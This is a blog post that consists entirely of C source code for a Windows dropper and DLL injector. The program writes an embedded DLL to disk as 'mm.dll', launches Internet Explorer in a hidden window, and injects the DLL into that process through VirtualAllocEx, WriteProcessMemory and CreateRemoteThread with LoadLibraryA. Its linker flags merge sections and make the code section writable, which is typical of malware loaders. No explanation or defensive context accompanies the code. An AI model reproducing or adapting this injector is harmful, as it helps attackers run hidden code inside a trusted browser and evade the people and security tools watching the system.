苏斌's blog

#include "stdafx.h"
#pragma comment(linker,"/ENTRY:subin /FILEALIGN:0x200 /MERGE:.data=.text /MERGE:.rdata=.text /SECTION:.text,EWR /IGNORE:4078")
#include"windows.h"
#include"tlhelp32.h"
#include "Winuser.h"
#include "resource.h"

void WriteResourceToFile(char const *filename)
{
    HINSTANCE hInstance=GetModuleHandle(NULL);
    HRSRC hResInfo = FindResource(hInstance, MAKEINTRESOURCE(ID_MAGICDEL_DLL),
                                  MAKEINTRESOURCE(RC_BINARYTYPE));
    HGLOBAL hgRes = LoadResource(hInstance, hResInfo);
    void *pvRes = LockResource(hgRes);
    DWORD cbRes = SizeofResource(hInstance, hResInfo);

   
    HANDLE hFile = CreateFile(filename, GENERIC_WRITE, 0, 0, CREATE_ALWAYS,
                              FILE_ATTRIBUTE_NORMAL, 0);
    DWORD cbWritten;
    WriteFile(hFile, pvRes, cbRes, &cbWritten, 0);
    CloseHandle(hFile);
}

int subin()
{
    WriteResourceToFile("mm.dll");
    STARTUPINFO si; //进程启动时需要初始化的结构
PROCESS_INFORMATION pi; //进程启动后的有关信息
si.cb = sizeof(STARTUPINFO);
GetStartupInfo(&si);
si.wShowWindow = SW_HIDE;//这里设置窗口为显示，SW_HIDE为隐藏窗口
si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
CreateProcess("C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE",
NULL,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi);
       HANDLE hS;
       hS = CreateToolhelp32Snapshot ( TH32CS_SNAPPROCESS, 0 ) ;
       if ( hS == INVALID_HANDLE_VALUE)
       {
            return 0;
       }
       char IPname[] = "IEXPLORE.EXE" ;
       PROCESSENTRY32 pe;
       pe.dwSize=sizeof(PROCESSENTRY32);
       BOOL fOk ;
       for(fOk = Process32First ( hS, &pe ) ; fOk;    fOk = Process32Next( hS, &pe ) )
       {
       //MessageBox(NULL,TEXT(pe.szExeFile),TEXT("MICHAEL"),0);
                if (!strcmpi(IPname,pe.szExeFile))
                {
                            HANDLE process=OpenProcess( PROCESS_ALL_ACCESS, false, pe.th32ProcessID ) ;
                            char szdll[128];
                            GetCurrentDirectory(128,szdll);
                            strcat(szdll,"\\mm.dll");
                            LPVOID psr;
                            int idl=sizeof(szdll)+1;
                            psr=VirtualAllocEx(process,NULL,idl,MEM_COMMIT,PAGE_READWRITE);
                            WriteProcessMemory(process,psr,(LPVOID)szdll,idl,NULL);
                            HMODULE hM;
                            LPTHREAD_START_ROUTINE fnSA;
                            hM = GetModuleHandle ( "kernel32.DLL" ) ;
                            fnSA=(LPTHREAD_START_ROUTINE) GetProcAddress(hM,"LoadLibraryA");
                            HANDLE hin=NULL;
                            hin=CreateRemoteThread(process,NULL,0,fnSA,psr,0,NULL);
                            if( hS != NULL )
                                CloseHandle ( hS ) ;//关闭进程快照
                            CloseHandle (process) ;
                            break ;
                }
       }
}